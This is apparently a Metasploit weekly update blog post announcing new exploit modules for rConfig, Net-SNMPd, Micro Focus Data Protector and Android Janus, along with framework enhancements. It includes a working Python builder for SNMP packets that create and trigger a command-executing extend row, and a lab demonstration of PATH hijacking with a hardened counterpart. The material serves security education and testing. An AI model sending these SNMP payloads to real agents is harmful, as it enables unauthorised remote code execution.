Last updated at Fri, 09 Feb 2024 14:31:15 GMT
Config R Us
Many versions of the network management tool rConfig are vulnerable to unauthenticated command injection, and contributor bcoles added a new exploit module targeting them. Present in v3.9.2 and prior, the vulnerability stems from the install directory not being cleaned up after installation, leaving behind a PHP file that can be used to execute arbitrary commands as the web server user. It also serves as a friendly reminder that it's good to clean up after yourself: once rConfig is installed, confirm that the install directory is actually gone from the web root.
RCE for SNMP
Targets running Net-SNMPd may be vulnerable to remote code execution, and, thanks to Steve Embling, we've got a new module for that. Relying on a community string with write access, this module supports SNMP versions 1 and 2c and uses the SNMP extension MIB (NET-SNMP-EXTEND-MIB) to make the agent run arbitrary commands on the target as the snmpd user. A read-only community is not enough, so the first thing to check on your own agents is whether any rwcommunity entries exist at all. Keep this one in mind next time you bump into Net-SNMPd with a writable community!
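To make the extension-MIB mechanism concrete, here is an added example (not code from the Metasploit module or from Net-SNMP) that encodes the SNMPv2c SetRequest which registers a command under an nsExtend token, followed by the GetRequest that reads the output column and thereby makes the agent run it. The column numbers come from NET-SNMP-EXTEND-MIB under enterprise 8072; the community string "private", the token "evil", the request id and the command are constructed for the demo. Nothing is sent on the network; the bytes are returned so they can be inspected or handed to a UDP socket on port 161.

```python
"""SNMPv2c SetRequest/GetRequest builder for NET-SNMP-EXTEND-MIB rows.

Added example, not the Metasploit module's code. The agent runs a row's
command when the output column is read (the default run type is
run-on-read), so the SET creates the row and the GET triggers execution.
"""

# NET-SNMP-EXTEND-MIB::nsExtendConfigEntry (...8072.1.3.2.2.1.<column>.<token>)
NS_EXTEND_CONFIG_ENTRY = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2, 2, 1)
COL_COMMAND, COL_ARGS, COL_STATUS = 2, 3, 21   # nsExtendCommand/Args/Status
ROW_STATUS_CREATE_AND_GO = 4                   # RowStatus createAndGo
# NET-SNMP-EXTEND-MIB::nsExtendOutput1Entry, column nsExtendOutputFull
NS_EXTEND_OUTPUT_FULL = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2, 3, 1, 2)


def _length(n: int) -> bytes:
    """BER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _length(len(body)) + body


def ber_integer(value: int) -> bytes:
    """Minimal two's-complement INTEGER (tag 0x02)."""
    if value == 0:
        return _tlv(0x02, b"\x00")
    size = (value.bit_length() + 8) // 8      # one extra bit for the sign
    return _tlv(0x02, value.to_bytes(size, "big", signed=True))


def ber_octet_string(data: bytes) -> bytes:
    return _tlv(0x04, data)


def ber_null() -> bytes:
    return b"\x05\x00"


def ber_oid(arcs) -> bytes:
    """OBJECT IDENTIFIER (tag 0x06): first two arcs packed, rest base-128."""
    first, second, *rest = arcs
    out = bytearray([first * 40 + second])
    for arc in rest:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(0x06, bytes(out))


def ber_sequence(*parts: bytes) -> bytes:
    return _tlv(0x30, b"".join(parts))


def token_index(token: str) -> tuple:
    """nsExtendToken is a DisplayString index without IMPLIED, so the row
    index is the string length followed by its bytes, one arc each."""
    raw = token.encode()
    return (len(raw),) + tuple(raw)


def _message(community: str, pdu_tag: int, request_id: int, varbinds: bytes) -> bytes:
    pdu = _tlv(pdu_tag, b"".join([ber_integer(request_id), ber_integer(0),
                                  ber_integer(0), varbinds]))
    # version 1 == SNMPv2c; v1 would be 0 with the same PDU layout
    return ber_sequence(ber_integer(1), ber_octet_string(community.encode()), pdu)


def build_set_request(community: str, token: str, command: str, args: str,
                      request_id: int = 1) -> bytes:
    """SetRequest-PDU (context tag 3) creating the extend row in one SET."""
    idx = token_index(token)
    varbinds = ber_sequence(
        ber_sequence(ber_oid(NS_EXTEND_CONFIG_ENTRY + (COL_STATUS,) + idx),
                     ber_integer(ROW_STATUS_CREATE_AND_GO)),
        ber_sequence(ber_oid(NS_EXTEND_CONFIG_ENTRY + (COL_COMMAND,) + idx),
                     ber_octet_string(command.encode())),
        ber_sequence(ber_oid(NS_EXTEND_CONFIG_ENTRY + (COL_ARGS,) + idx),
                     ber_octet_string(args.encode())),
    )
    return _message(community, 0xA3, request_id, varbinds)


def build_get_request(community: str, token: str, request_id: int = 2) -> bytes:
    """GetRequest-PDU (context tag 0) for nsExtendOutputFull of the row;
    answering it is what makes the agent execute the command."""
    varbinds = ber_sequence(
        ber_sequence(ber_oid(NS_EXTEND_OUTPUT_FULL + token_index(token)), ber_null()))
    return _message(community, 0xA0, request_id, varbinds)


if __name__ == "__main__":
    print(build_set_request("private", "evil", "/bin/sh", "-c id").hex())
    print(build_get_request("private", "evil").hex())
```

The row is created in a single SET because RowStatus createAndGo accepts the other required columns in the same PDU. Note that the whole exchange is plaintext UDP: the community string that grants write access travels in the clear, which is one more reason a writable v1/v2c community should not exist on an agent you care about.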
Keeping things in (Micro) Focus…
Contributor s7u55 swung by with a new privesc module targeting Data Protector software from Micro Focus (formerly HPE Software). Vulnerable versions of Data Protector let this module abuse the trusted $PATH environment variable of the SUID binary omniresolve, leading to privilege escalation. Although this vulnerability was patched in version 10.40, many earlier versions of Data Protector may still be vulnerable.
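The following is an added example, not Data Protector code, of the general mechanism this class of bug relies on: a privileged program runs a helper by bare name, so whatever directory the caller put first in PATH decides which file executes. The helper name "dp_helper", the directories and the two scripts are constructed for the demo; shell scripts stand in for the SUID binary and its helper so the whole thing runs unprivileged in a temp directory.

```python
"""PATH hijacking against a helper invoked by bare name, and the hardened form.

Added example; "dp_helper" and the lab directories are made up for the demo.
"""
import os
import subprocess
import tempfile


def _write_script(path: str, message: str) -> None:
    with open(path, "w") as fh:
        fh.write(f"#!/bin/sh\necho {message}\n")
    os.chmod(path, 0o755)


def build_lab() -> dict:
    """Constructed fixture: a trusted directory holding the real helper and an
    attacker-writable directory holding a same-named impostor."""
    root = tempfile.mkdtemp(prefix="path_hijack_")
    trusted = os.path.join(root, "trusted")
    attacker = os.path.join(root, "attacker")
    os.mkdir(trusted)
    os.mkdir(attacker)
    _write_script(os.path.join(trusted, "dp_helper"), "legit")
    _write_script(os.path.join(attacker, "dp_helper"), "hijacked")
    return {"trusted": trusted, "attacker": attacker}


def _run(argv, env) -> str:
    # On POSIX, subprocess resolves a bare program name through the PATH
    # of the env mapping it is given, just as execvp would for a real binary.
    return subprocess.run(argv, env=env, capture_output=True, text=True,
                          check=True).stdout.strip()


def vulnerable_invoke(lab: dict) -> str:
    """Vulnerable pattern: trust the inherited PATH and run the helper by
    bare name. A local user can put their directory first in PATH before
    running a SUID binary, so their file is the one that executes."""
    inherited = {"PATH": f"{lab['attacker']}:{lab['trusted']}:/usr/bin:/bin"}
    return _run(["dp_helper"], inherited)


def hardened_invoke(lab: dict) -> str:
    """Hardened pattern: discard the caller's environment, pin PATH to a
    fixed root-owned value, and exec the helper by absolute path."""
    clean = {"PATH": "/usr/bin:/bin"}
    return _run([os.path.join(lab["trusted"], "dp_helper")], clean)


if __name__ == "__main__":
    lab = build_lab()
    print("vulnerable:", vulnerable_invoke(lab))
    print("hardened:  ", hardened_invoke(lab))
```

The point to carry over to real SUID binaries is that the loader strips dangerous variables such as LD_PRELOAD for set-user-ID programs, but it does nothing about PATH; any helper the binary launches must therefore be named by absolute path, and PATH set explicitly before any exec.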
A penny for your thoughts...
We've got a fantastic new docs writer onboard, and she’s helping us improve and expand Metasploit documentation. Which areas of Framework could be better documented? Which areas totally lack explanation or useful examples? Let us know here!
New modules (4)
- Micro Focus (HPE) Data Protector SUID Privilege Escalation by s7u55, which exploits CVE-2019-11660.
- Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution by Steve Embling at InteliSecure.
- rConfig install Command Execution by bcoles and mhaskar, which exploits CVE-2019-16662.
- Android Janus APK Signature bypass by GuardSquare, V-E-O, h00die, and timwr, which exploits CVE-2017-13156.
Enhancements and features
- PR #12510 from wvu-r7 updates the Msf::Exploit::HttpClient mixin, allowing modules to elect to receive a partial response to an HTTP request when the server times out before sending the total length advertised in the response headers.
- PR #12535 from bcoles adds the Reliability and Stability module traits to a handful of local exploit modules.
- PR #12492 from wvu-r7 updates the coldfusion_rds module (and moves and renames it more appropriately to coldfusion_rds_auth_bypass) to improve vulnerable page detection.
- PR #12495 from h00die adds documentation for the Android screen capture and lock removal post modules.
- PR #12522 from cnotin updates the description for the THREADS option in scanner modules to clarify that only one thread is created per target host.
- PR #12547 from jeffmcjunkin updates the null-pointer-deref.txt banner to MSF5.
Bugs fixed
- PR #12463 from bwatters-r7 fixes delimiter selection on PowerShell payload commands.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:
We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).